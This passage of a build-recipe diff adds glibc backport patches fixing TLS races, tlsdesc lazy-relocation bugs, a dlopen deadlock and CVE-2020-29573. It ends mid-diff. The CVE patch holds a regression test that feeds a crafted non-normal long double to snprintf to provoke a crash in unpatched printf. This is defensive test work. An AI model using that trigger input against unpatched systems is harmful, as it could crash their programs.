+Reviewed-by: Szabolcs Nagy <szabolcs.nagy@arm.com>
+---
+ elf/dl-close.c             |   8 +-
+ elf/dl-load.c              |   2 +-
+ elf/dl-open.c              |  10 --
+ elf/dl-tls.c               |  17 +--
+ elf/rtld.c                 |   2 +-
+ sysdeps/generic/ldsodefs.h |   4 +-
+ 6 files changed, 349 insertions(+), 33 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ba33937be210da5d07f7f01709323743f66011ce]
+Comment: Removed hunks those were related to test. Hunk from elf/rtld.c is refreshed.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index 3720e47dd1..f39001cab9 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -77,8 +77,6 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+ 	 object that wasn't fully set up.  */
+       if (__glibc_likely (old_map != NULL))
+ 	{
+-	  assert (old_map->l_tls_modid == idx);
+-
+ 	  /* Mark the entry as unused.  These can be read concurrently.  */
+ 	  atomic_store_relaxed (&listp->slotinfo[idx - disp].gen,
+ 				GL(dl_tls_generation) + 1);
+@@ -88,7 +86,11 @@ remove_slotinfo (size_t idx, struct dtv_slotinfo_list *listp, size_t disp,
+       /* If this is not the last currently used entry no need to look
+ 	 further.  */
+       if (idx != GL(dl_tls_max_dtv_idx))
+-	return true;
++	{
++	  /* There is an unused dtv entry in the middle.  */
++	  GL(dl_tls_dtv_gaps) = true;
++	  return true;
++	}
+     }
+ 
+   while (idx - disp > (disp == 0 ? 1 + GL(dl_tls_static_nelem) : 0))
+diff --git a/elf/dl-load.c b/elf/dl-load.c
+index a08df001af..650e4edc35 100644
+--- a/elf/dl-load.c
++++ b/elf/dl-load.c
+@@ -1498,7 +1498,7 @@ cannot enable executable stack as shared object requires");
+ 	     not set up TLS data structures, so don't use them now.  */
+ 	  || __glibc_likely (GL(dl_tls_dtv_slotinfo_list) != NULL)))
+     /* Assign the next available module ID.  */
+-    l->l_tls_modid = _dl_next_tls_modid ();
++    _dl_assign_tls_modid (l);
+ 
+ #ifdef DL_AFTER_LOAD
+   DL_AFTER_LOAD (l);
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index a066f39bd0..d2240d8747 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -899,16 +899,6 @@ no more namespaces available for dlmopen()"));
+ 	 state if relocation failed, for example.  */
+       if (args.map)
+ 	{
+-	  /* Maybe some of the modules which were loaded use TLS.
+-	     Since it will be removed in the following _dl_close call
+-	     we have to mark the dtv array as having gaps to fill the
+-	     holes.  This is a pessimistic assumption which won't hurt
+-	     if not true.  There is no need to do this when we are
+-	     loading the auditing DSOs since TLS has not yet been set
+-	     up.  */
+-	  if ((mode & __RTLD_AUDIT) == 0)
+-	    GL(dl_tls_dtv_gaps) = true;
+-
+ 	  _dl_close_worker (args.map, true);
+ 
+ 	  /* All l_nodelete_pending objects should have been deleted
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index 2b5161d10a..423e380f7c 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -126,8 +126,8 @@ oom (void)
+ }
+ 
+ 
+-size_t
+-_dl_next_tls_modid (void)
++void
++_dl_assign_tls_modid (struct link_map *l)
+ {
+   size_t result;
+ 
+@@ -157,7 +157,11 @@ _dl_next_tls_modid (void)
+ 	      }
+ 
+ 	    if (result - disp < runp->len)
+-	      break;
++	      {
++		/* Mark the entry as used, so any dependency see it.  */
++		atomic_store_relaxed (&runp->slotinfo[result - disp].map, l);
++		break;
++	      }
+ 
+ 	    disp += runp->len;
+ 	  }
+@@ -184,17 +188,14 @@ _dl_next_tls_modid (void)
+       atomic_store_relaxed (&GL(dl_tls_max_dtv_idx), result);
+     }
+ 
+-  return result;
++  l->l_tls_modid = result;
+ }
+ 
+ 
+ size_t
+ _dl_count_modids (void)
+ {
+-  /* It is rare that we have gaps; see elf/dl-open.c (_dl_open) where
+-     we fail to load a module and unload it leaving a gap.  If we don't
+-     have gaps then the number of modids is the current maximum so
+-     return that.  */
++  /* The count is the max unless dlclose or failed dlopen created gaps.  */
+   if (__glibc_likely (!GL(dl_tls_dtv_gaps)))
+     return GL(dl_tls_max_dtv_idx);
+ 
+diff --git a/elf/rtld.c b/elf/rtld.c
+index e3fb2a5b2a..d733359eaf 100644
+--- a/elf/rtld.c
++++ b/elf/rtld.c
+@@ -1612,7 +1612,7 @@
+   /* Add the dynamic linker to the TLS list if it also uses TLS.  */
+   if (GL(dl_rtld_map).l_tls_blocksize != 0)
+     /* Assign a module ID.  Do this before loading any audit modules.  */
+-    GL(dl_rtld_map).l_tls_modid = _dl_next_tls_modid ();
++    _dl_assign_tls_modid (&GL(dl_rtld_map));
+ 
+   /* If we have auditing DSOs to load, do it now.  */
+   bool need_security_init = true;
+diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
+index 176394de4d..9c15259236 100644
+--- a/sysdeps/generic/ldsodefs.h
++++ b/sysdeps/generic/ldsodefs.h
+@@ -1171,8 +1171,8 @@ extern ElfW(Addr) _dl_sysdep_start (void **start_argptr,
+ extern void _dl_sysdep_start_cleanup (void) attribute_hidden;
+ 
+ 
+-/* Determine next available module ID.  */
+-extern size_t _dl_next_tls_modid (void) attribute_hidden;
++/* Determine next available module ID and set the L l_tls_modid.  */
++extern void _dl_assign_tls_modid (struct link_map *l) attribute_hidden;
+ 
+ /* Count the modules with TLS segments.  */
+ extern size_t _dl_count_modids (void) attribute_hidden;
+-- 
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..899111b118
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0035-x86_64-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,56 @@
+From 8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Thu, 11 Feb 2021 11:29:23 +0000
+Subject: [PATCH] x86_64: Avoid lazy relocation of tlsdesc [BZ #27137]
+
+Lazy tlsdesc relocation is racy because the static tls optimization and
+tlsdesc management operations are done without holding the dlopen lock.
+
+This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
+for aarch64, but it fixes a different race: bug 27137.
+
+Another issue is that ld auditing ignores DT_BIND_NOW and thus tries to
+relocate tlsdesc lazily, but that does not work in a BIND_NOW module
+due to missing DT_TLSDESC_PLT. Unconditionally relocating tlsdesc at
+load time fixes this bug 27721 too.
+---
+ sysdeps/x86_64/dl-machine.h | 19 ++++++++++++++-----
+ 1 file changed, 14 insertions(+), 5 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=8f7e09f4dbdb5c815a18b8285fbc5d5d7bc17d86]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/sysdeps/x86_64/dl-machine.h b/sysdeps/x86_64/dl-machine.h
+index 103eee6c3f..9a876a371e 100644
+--- a/sysdeps/x86_64/dl-machine.h
++++ b/sysdeps/x86_64/dl-machine.h
+@@ -570,12 +570,21 @@ elf_machine_lazy_rel (struct link_map *map,
+     }
+   else if (__glibc_likely (r_type == R_X86_64_TLSDESC))
+     {
+-      struct tlsdesc volatile * __attribute__((__unused__)) td =
+-	(struct tlsdesc volatile *)reloc_addr;
++      const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
++      const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
++      const ElfW (Sym) *sym = &symtab[symndx];
++      const struct r_found_version *version = NULL;
+ 
+-      td->arg = (void*)reloc;
+-      td->entry = (void*)(D_PTR (map, l_info[ADDRIDX (DT_TLSDESC_PLT)])
+-			  + map->l_addr);
++      if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
++	{
++	  const ElfW (Half) *vernum =
++	    (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++	  version = &map->l_versions[vernum[symndx] & 0x7fff];
++	}
++
++      /* Always initialize TLS descriptors completely at load time, in
++	 case static TLS is allocated for it that requires locking.  */
++      elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
+     }
+   else if (__glibc_unlikely (r_type == R_X86_64_IRELATIVE))
+     {
+-- 
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
new file mode 100644
index 0000000000..ad0a1147aa
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0036-i386-Avoid-lazy-relocation-of-tlsdesc-BZ-27137.patch
@@ -0,0 +1,124 @@
+From ddcacd91cc10ff92d6201eda87047d029c14158d Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Thu, 11 Feb 2021 11:40:11 +0000
+Subject: [PATCH] i386: Avoid lazy relocation of tlsdesc [BZ #27137]
+
+Lazy tlsdesc relocation is racy because the static tls optimization and
+tlsdesc management operations are done without holding the dlopen lock.
+
+This similar to the commit b7cf203b5c17dd6d9878537d41e0c7cc3d270a67
+for aarch64, but it fixes a different race: bug 27137.
+
+On i386 the code is a bit more complicated than on x86_64 because both
+rel and rela relocs are supported.
+---
+ sysdeps/i386/dl-machine.h | 76 ++++++++++++++++++---------------------
+ 1 file changed, 34 insertions(+), 42 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=ddcacd91cc10ff92d6201eda87047d029c14158d]
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/sysdeps/i386/dl-machine.h b/sysdeps/i386/dl-machine.h
+index 23e9cc3bfb..590b41d8d7 100644
+--- a/sysdeps/i386/dl-machine.h
++++ b/sysdeps/i386/dl-machine.h
+@@ -688,50 +688,32 @@ elf_machine_lazy_rel (struct link_map *map,
+     }
+   else if (__glibc_likely (r_type == R_386_TLS_DESC))
+     {
+-      struct tlsdesc volatile * __attribute__((__unused__)) td =
+-	(struct tlsdesc volatile *)reloc_addr;
+-
+-      /* Handle relocations that reference the local *ABS* in a simple
+-	 way, so as to preserve a potential addend.  */
+-      if (ELF32_R_SYM (reloc->r_info) == 0)
+-	td->entry = _dl_tlsdesc_resolve_abs_plus_addend;
+-      /* Given a known-zero addend, we can store a pointer to the
+-	 reloc in the arg position.  */
+-      else if (td->arg == 0)
+-	{
+-	  td->arg = (void*)reloc;
+-	  td->entry = _dl_tlsdesc_resolve_rel;
+-	}
+-      else
+-	{
+-	  /* We could handle non-*ABS* relocations with non-zero addends
+-	     by allocating dynamically an arg to hold a pointer to the
+-	     reloc, but that sounds pointless.  */
+-	  const Elf32_Rel *const r = reloc;
+-	  /* The code below was borrowed from elf_dynamic_do_rel().  */
+-	  const ElfW(Sym) *const symtab =
+-	    (const void *) D_PTR (map, l_info[DT_SYMTAB]);
++      const Elf32_Rel *const r = reloc;
++      /* The code below was borrowed from elf_dynamic_do_rel().  */
++      const ElfW(Sym) *const symtab =
++	(const void *) D_PTR (map, l_info[DT_SYMTAB]);
+ 
++      /* Always initialize TLS descriptors completely at load time, in
++	 case static TLS is allocated for it that requires locking.  */
+ # ifdef RTLD_BOOTSTRAP
+-	  /* The dynamic linker always uses versioning.  */
+-	  assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
++      /* The dynamic linker always uses versioning.  */
++      assert (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL);
+ # else
+-	  if (map->l_info[VERSYMIDX (DT_VERSYM)])
++      if (map->l_info[VERSYMIDX (DT_VERSYM)])
+ # endif
+-	    {
+-	      const ElfW(Half) *const version =
+-		(const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
+-	      ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
+-	      elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
+-			       &map->l_versions[ndx],
+-			       (void *) (l_addr + r->r_offset), skip_ifunc);
+-	    }
++	{
++	  const ElfW(Half) *const version =
++	    (const void *) D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++	  ElfW(Half) ndx = version[ELFW(R_SYM) (r->r_info)] & 0x7fff;
++	  elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)],
++			   &map->l_versions[ndx],
++			   (void *) (l_addr + r->r_offset), skip_ifunc);
++	}
+ # ifndef RTLD_BOOTSTRAP
+-	  else
+-	    elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
+-			     (void *) (l_addr + r->r_offset), skip_ifunc);
++      else
++	elf_machine_rel (map, r, &symtab[ELFW(R_SYM) (r->r_info)], NULL,
++			 (void *) (l_addr + r->r_offset), skip_ifunc);
+ # endif
+-	}
+     }
+   else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
+     {
+@@ -758,11 +740,21 @@ elf_machine_lazy_rela (struct link_map *map,
+     ;
+   else if (__glibc_likely (r_type == R_386_TLS_DESC))
+     {
+-      struct tlsdesc volatile * __attribute__((__unused__)) td =
+-	(struct tlsdesc volatile *)reloc_addr;
++      const Elf_Symndx symndx = ELFW (R_SYM) (reloc->r_info);
++      const ElfW (Sym) *symtab = (const void *)D_PTR (map, l_info[DT_SYMTAB]);
++      const ElfW (Sym) *sym = &symtab[symndx];
++      const struct r_found_version *version = NULL;
++
++      if (map->l_info[VERSYMIDX (DT_VERSYM)] != NULL)
++	{
++	  const ElfW (Half) *vernum =
++	    (const void *)D_PTR (map, l_info[VERSYMIDX (DT_VERSYM)]);
++	  version = &map->l_versions[vernum[symndx] & 0x7fff];
++	}
+ 
+-      td->arg = (void*)reloc;
+-      td->entry = _dl_tlsdesc_resolve_rela;
++      /* Always initialize TLS descriptors completely at load time, in
++	 case static TLS is allocated for it that requires locking.  */
++      elf_machine_rela (map, reloc, sym, version, reloc_addr, skip_ifunc);
+     }
+   else if (__glibc_unlikely (r_type == R_386_IRELATIVE))
+     {
+-- 
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
new file mode 100644
index 0000000000..7a10131bad
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/0037-Avoid-deadlock-between-pthread_create-and-ctors.patch
@@ -0,0 +1,276 @@
+From 83b5323261bb72313bffcf37476c1b8f0847c736 Mon Sep 17 00:00:00 2001
+From: Szabolcs Nagy <szabolcs.nagy@arm.com>
+Date: Wed, 15 Sep 2021 15:16:19 +0100
+Subject: [PATCH] elf: Avoid deadlock between pthread_create and ctors [BZ
+ #28357]
+
+The fix for bug 19329 caused a regression such that pthread_create can
+deadlock when concurrent ctors from dlopen are waiting for it to finish.
+Use a new GL(dl_load_tls_lock) in pthread_create that is not taken
+around ctors in dlopen.
+
+The new lock is also used in __tls_get_addr instead of GL(dl_load_lock).
+
+The new lock is held in _dl_open_worker and _dl_close_worker around
+most of the logic before/after the init/fini routines.  When init/fini
+routines are running then TLS is in a consistent, usable state.
+In _dl_open_worker the new lock requires catching and reraising dlopen
+failures that happen in the critical section.
+
+The new lock is reinitialized in a fork child, to keep the existing
+behaviour and it is kept recursive in case malloc interposition or TLS
+access from signal handlers can retake it.  It is not obvious if this
+is necessary or helps, but avoids changing the preexisting behaviour.
+
+The new lock may be more appropriate for dl_iterate_phdr too than
+GL(dl_load_write_lock), since TLS state of an incompletely loaded
+module may be accessed.  If the new lock can replace the old one,
+that can be a separate change.
+
+Fixes bug 28357.
+
+Reviewed-by: Adhemerval Zanella  <adhemerval.zanella@linaro.org>
+---
+ elf/dl-close.c                   |   6 ++
+ elf/dl-open.c                    |  35 ++++++++-
+ elf/dl-support.c                 |   7 ++
+ elf/dl-tls.c                     |  16 ++---
+ elf/rtld.c                       |   1 +
+ sysdeps/nptl/fork.c              |   3 +
+ sysdeps/generic/ldsodefs.h       |   9 ++-
+ 10 files changed, 235 insertions(+), 12 deletions(-)
+---
+Upstream-Status: Backport [https://sourceware.org/git/?p=glibc.git;a=patch;h=024a7640ab9ecea80e527f4e4d7f7a1868e952c5]
+Comment: This patch is refreshed for glibc 2.31. In upstream glibc 2.34 multiple src files are shuffled, updated this patch as per the code present in glibc 2.31. Removed test case.
+Signed-off-by: Akash Hadke <akash.hadke@kpit.com>
+Signed-off-by: Akash Hadke <hadkeakash4@gmail.com>
+---
+diff --git a/elf/dl-close.c b/elf/dl-close.c
+index 93ff5c96e9..cfe0f1c0c9 100644
+--- a/elf/dl-close.c
++++ b/elf/dl-close.c
+@@ -551,6 +551,9 @@
+   size_t tls_free_end;
+   tls_free_start = tls_free_end = NO_TLS_OFFSET;
+ 
++  /* Protects global and module specitic TLS state.  */
++  __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
++
+   /* We modify the list of loaded objects.  */
+   __rtld_lock_lock_recursive (GL(dl_load_write_lock));
+ 
+@@ -786,6 +789,9 @@
+ 	GL(dl_tls_static_used) = tls_free_start;
+     }
+ 
++  /* TLS is cleaned up for the unloaded modules.  */
++  __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
++
+ #ifdef SHARED
+   /* Auditing checkpoint: we have deleted all objects.  */
+   if (__glibc_unlikely (do_audit))
+diff --git a/elf/dl-open.c b/elf/dl-open.c
+index 5295e931b0..6ea5dd2457 100644
+--- a/elf/dl-open.c
++++ b/elf/dl-open.c
+@@ -57,6 +57,9 @@
+      (non-negative).  */
+   unsigned int original_global_scope_pending_adds;
+ 
++  /* Set to true if the end of dl_open_worker_begin was reached.  */
++  bool worker_continue;
++
+   /* Original parameters to the program and the current environment.  */
+   int argc;
+   char **argv;
+@@ -473,7 +473,7 @@
+ }
+ 
+ static void
+-dl_open_worker (void *a)
++dl_open_worker_begin (void *a)
+ {
+   struct dl_open_args *args = a;
+   const char *file = args->file;
+@@ -747,6 +747,36 @@
+   if (mode & RTLD_GLOBAL)
+     add_to_global_resize (new);
+ 
++  args->worker_continue = true;
++}
++
++static void
++dl_open_worker (void *a)
++{
++  struct dl_open_args *args = a;
++
++  args->worker_continue = false;
++
++  {
++    /* Protects global and module specific TLS state.  */
++    __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
++
++    struct dl_exception ex;
++    int err = _dl_catch_exception (&ex, dl_open_worker_begin, args);
++
++    __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
++
++    if (__glibc_unlikely (ex.errstring != NULL))
++      /* Reraise the error.  */
++      _dl_signal_exception (err, &ex, NULL);
++  }
++
++  if (!args->worker_continue)
++    return;
++
++  int mode = args->mode;
++  struct link_map *new = args->map;
++
+   /* Run the initializer functions of new objects.  Temporarily
+      disable the exception handler, so that lazy binding failures are
+      fatal.  */
+diff --git a/elf/dl-support.c b/elf/dl-support.c
+index 02e2ed72f5..d99c1f1d62 100644
+--- a/elf/dl-support.c
++++ b/elf/dl-support.c
+@@ -219,6 +219,13 @@
+    list of loaded objects while an object is added to or removed from
+    that list.  */
+ __rtld_lock_define_initialized_recursive (, _dl_load_write_lock)
++/* This lock protects global and module specific TLS related data.
++   E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
++   GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
++   accessed and when TLS related relocations are processed for a
++   module.  It was introduced to keep pthread_create accessing TLS
++   state that is being set up.  */
++__rtld_lock_define_initialized_recursive (, _dl_load_tls_lock)
+ 
+ 
+ #ifdef HAVE_AUX_VECTOR
+diff --git a/elf/dl-tls.c b/elf/dl-tls.c
+index d554ae4497..9260d2d696 100644
+--- a/elf/dl-tls.c
++++ b/elf/dl-tls.c
+@@ -443,7 +443,7 @@
+   size_t maxgen = 0;
+ 
+   /* Protects global dynamic TLS related state.  */
+-  __rtld_lock_lock_recursive (GL(dl_load_lock));
++  __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
+ 
+   /* Check if the current dtv is big enough.   */
+   if (dtv[-1].counter < GL(dl_tls_max_dtv_idx))
+@@ -517,7 +517,7 @@
+       listp = listp->next;
+       assert (listp != NULL);
+     }
+-  __rtld_lock_unlock_recursive (GL(dl_load_lock));
++  __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+ 
+   /* The DTV version is up-to-date now.  */
+   dtv[0].counter = maxgen;
+@@ -656,7 +656,7 @@
+ 
+ 	 Here the dtv needs to be updated to new_gen generation count.
+ 
+-	 This code may be called during TLS access when GL(dl_load_lock)
++	 This code may be called during TLS access when GL(dl_load_tls_lock)
+ 	 is not held.  In that case the user code has to synchronize with
+ 	 dlopen and dlclose calls of relevant modules.  A module m is
+ 	 relevant if the generation of m <= new_gen and dlclose of m is
+@@ -778,11 +778,11 @@
+   if (__glibc_unlikely (the_map->l_tls_offset
+ 			!= FORCED_DYNAMIC_TLS_OFFSET))
+     {
+-      __rtld_lock_lock_recursive (GL(dl_load_lock));
++      __rtld_lock_lock_recursive (GL(dl_load_tls_lock));
+       if (__glibc_likely (the_map->l_tls_offset == NO_TLS_OFFSET))
+ 	{
+ 	  the_map->l_tls_offset = FORCED_DYNAMIC_TLS_OFFSET;
+-	  __rtld_lock_unlock_recursive (GL(dl_load_lock));
++	  __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+ 	}
+       else if (__glibc_likely (the_map->l_tls_offset
+ 			       != FORCED_DYNAMIC_TLS_OFFSET))
+@@ -794,7 +794,7 @@
+ #else
+ # error "Either TLS_TCB_AT_TP or TLS_DTV_AT_TP must be defined"
+ #endif
+-	  __rtld_lock_unlock_recursive (GL(dl_load_lock));
++	  __rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+ 
+ 	  dtv[GET_ADDR_MODULE].pointer.to_free = NULL;
+ 	  dtv[GET_ADDR_MODULE].pointer.val = p;
+@@ -802,7 +802,7 @@
+ 	  return (char *) p + GET_ADDR_OFFSET;
+ 	}
+       else
+-	__rtld_lock_unlock_recursive (GL(dl_load_lock));
++	__rtld_lock_unlock_recursive (GL(dl_load_tls_lock));
+     }
+   struct dtv_pointer result = allocate_and_init (the_map);
+   dtv[GET_ADDR_MODULE].pointer = result;
+@@ -873,7 +873,7 @@
+     return NULL;
+ 
+   dtv_t *dtv = THREAD_DTV ();
+-  /* This may be called without holding the GL(dl_load_lock).  Reading
++  /* This may be called without holding the GL(dl_load_tls_lock).  Reading
+      arbitrary gen value is fine since this is best effort code.  */
+   size_t gen = atomic_load_relaxed (&GL(dl_tls_generation));
+   if (__glibc_unlikely (dtv[0].counter != gen))
+diff --git a/elf/rtld.c b/elf/rtld.c
+index 8d2bba3d43..9642eb9c92 100644
+--- a/elf/rtld.c
++++ b/elf/rtld.c
+@@ -283,6 +283,7 @@
+ #ifdef _LIBC_REENTRANT
+     ._dl_load_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
+     ._dl_load_write_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
++    ._dl_load_tls_lock = _RTLD_LOCK_RECURSIVE_INITIALIZER,
+ #endif
+     ._dl_nns = 1,
+     ._dl_ns =
+diff --git a/sysdeps/nptl/fork.c b/sysdeps/nptl/fork.c
+index c471f7b15f..021691b9b7 100644
+--- a/sysdeps/nptl/fork.c
++++ b/sysdeps/nptl/fork.c
+@@ -125,6 +125,9 @@
+       /* Reset the lock the dynamic loader uses to protect its data.  */
+       __rtld_lock_initialize (GL(dl_load_lock));
+ 
++      /* Reset the lock protecting dynamic TLS related data.  */
++      __rtld_lock_initialize (GL(dl_load_tls_lock));
++
+       /* Run the handlers registered for the child.  */
+       __run_fork_handlers (atfork_run_child, multiple_threads);
+     }
+diff --git a/sysdeps/generic/ldsodefs.h b/sysdeps/generic/ldsodefs.h
+index d49529da0d..9ec1511bb0 100644
+--- a/sysdeps/generic/ldsodefs.h
++++ b/sysdeps/generic/ldsodefs.h
+@@ -369,6 +369,13 @@
+      list of loaded objects while an object is added to or removed
+      from that list.  */
+   __rtld_lock_define_recursive (EXTERN, _dl_load_write_lock)
++  /* This lock protects global and module specific TLS related data.
++     E.g. it is held in dlopen and dlclose when GL(dl_tls_generation),
++     GL(dl_tls_max_dtv_idx) or GL(dl_tls_dtv_slotinfo_list) are
++     accessed and when TLS related relocations are processed for a
++     module.  It was introduced to keep pthread_create accessing TLS
++     state that is being set up.  */
++  __rtld_lock_define_recursive (EXTERN, _dl_load_tls_lock)
+ 
+   /* Incremented whenever something may have been added to dl_loaded.  */
+   EXTERN unsigned long long _dl_load_adds;
+@@ -1153,7 +1160,7 @@
+ 
+ /* Add module to slot information data.  If DO_ADD is false, only the
+    required memory is allocated.  Must be called with GL
+-   (dl_load_lock) acquired.  If the function has already been called
++   (dl_load_tls_lock) acquired.  If the function has already been called
+    for the link map L with !do_add, then this function will not raise
+    an exception, otherwise it is possible that it encounters a memory
+    allocation failure.  */
+-- 
+2.27.0
diff --git a/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch b/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch
new file mode 100644
index 0000000000..1e75f2d29d
--- /dev/null
+++ b/meta/recipes-core/glibc/glibc/CVE-2020-29573.patch
@@ -0,0 +1,128 @@
+From 681900d29683722b1cb0a8e565a0585846ec5a61 Mon Sep 17 00:00:00 2001
+From: Florian Weimer <fweimer@redhat.com>
+Date: Tue, 22 Sep 2020 19:07:48 +0200
+Subject: [PATCH] x86: Harden printf against non-normal long double values (bug
+ 26649)
+
+The behavior of isnan/__builtin_isnan on bit patterns that do not
+correspond to something that the CPU would produce from valid inputs
+is currently under-defined in the toolchain. (The GCC built-in and
+glibc disagree.)
+
+The isnan check in PRINTF_FP_FETCH in stdio-common/printf_fp.c
+assumes the GCC behavior that returns true for non-normal numbers
+which are not specified as NaN. (The glibc implementation returns
+false for such numbers.)
+
+At present, passing non-normal numbers to __mpn_extract_long_double
+causes this function to produce irregularly shaped multi-precision
+integers, triggering undefined behavior in __printf_fp_l.
+
+With GCC 10 and glibc 2.32, this behavior is not visible because
+__builtin_isnan is used, which avoids calling
+__mpn_extract_long_double in this case.  This commit updates the
+implementation of __mpn_extract_long_double so that regularly shaped
+multi-precision integers are produced in this case, avoiding
+undefined behavior in __printf_fp_l.
+
+Upstream-Status: Backport [git://sourceware.org/git/glibc.git]
+CVE: CVE-2020-29573
+Signed-off-By: Armin Kuster <akuster@mvista.com>
+
+---
+ sysdeps/x86/Makefile                    |  4 ++
+ sysdeps/x86/ldbl2mpn.c                  |  8 ++++
+ sysdeps/x86/tst-ldbl-nonnormal-printf.c | 52 +++++++++++++++++++++++++
+ 3 files changed, 64 insertions(+)
+ create mode 100644 sysdeps/x86/tst-ldbl-nonnormal-printf.c
+
+Index: git/sysdeps/x86/Makefile
+===================================================================
+--- git.orig/sysdeps/x86/Makefile
++++ git/sysdeps/x86/Makefile
+@@ -9,6 +9,10 @@ tests += tst-get-cpu-features tst-get-cp
+ tests-static += tst-get-cpu-features-static
+ endif
+ 
++ifeq ($(subdir),math)
++tests += tst-ldbl-nonnormal-printf
++endif # $(subdir) == math
++
+ ifeq ($(subdir),setjmp)
+ gen-as-const-headers += jmp_buf-ssp.sym
+ sysdep_routines += __longjmp_cancel
+Index: git/sysdeps/x86/tst-ldbl-nonnormal-printf.c
+===================================================================
+--- /dev/null
++++ git/sysdeps/x86/tst-ldbl-nonnormal-printf.c
+@@ -0,0 +1,52 @@
++/* Test printf with x86-specific non-normal long double value.
++   Copyright (C) 2020 Free Software Foundation, Inc.
++
++   This file is part of the GNU C Library.
++
++   The GNU C Library is free software; you can redistribute it and/or
++   modify it under the terms of the GNU Lesser General Public
++   License as published by the Free Software Foundation; either
++   version 2.1 of the License, or (at your option) any later version.
++
++   The GNU C Library is distributed in the hope that it will be useful,
++   but WITHOUT ANY WARRANTY; without even the implied warranty of
++   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
++   Lesser General Public License for more details.
++
++   You should have received a copy of the GNU Lesser General Public
++   License along with the GNU C Library; if not, see
++   <https://www.gnu.org/licenses/>.  */
++
++#include <stdio.h>
++#include <string.h>
++#include <support/check.h>
++
++/* Fill the stack with non-zero values.  This makes a crash in
++   snprintf more likely.  */
++static void __attribute__ ((noinline, noclone))
++fill_stack (void)
++{
++  char buffer[65536];
++  memset (buffer, 0xc0, sizeof (buffer));
++  asm ("" ::: "memory");
++}
++
++static int
++do_test (void)
++{
++  fill_stack ();
++
++  long double value;
++  memcpy (&value, "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x04", 10);
++
++  char buf[30];
++  int ret = snprintf (buf, sizeof (buf), "%Lg", value);
++  TEST_COMPARE (ret, strlen (buf));
++  if (strcmp (buf, "nan") != 0)
++    /* If snprintf does not recognize the non-normal number as a NaN,
++       it has added the missing explicit MSB.  */
++    TEST_COMPARE_STRING (buf, "3.02201e-4624");
++  return 0;
++}
++
++#include <support/test-driver.c>
+Index: git/sysdeps/i386/ldbl2mpn.c
+===================================================================
+--- git.orig/sysdeps/i386/ldbl2mpn.c
++++ git/sysdeps/i386/ldbl2mpn.c
